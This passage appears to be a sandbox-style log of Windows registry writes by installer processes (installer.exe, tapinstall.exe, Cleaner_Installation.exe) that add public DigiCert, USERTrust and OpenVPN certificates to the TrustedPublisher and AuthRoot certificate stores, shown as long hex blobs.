8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner_Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Cleaner_Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner_Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b0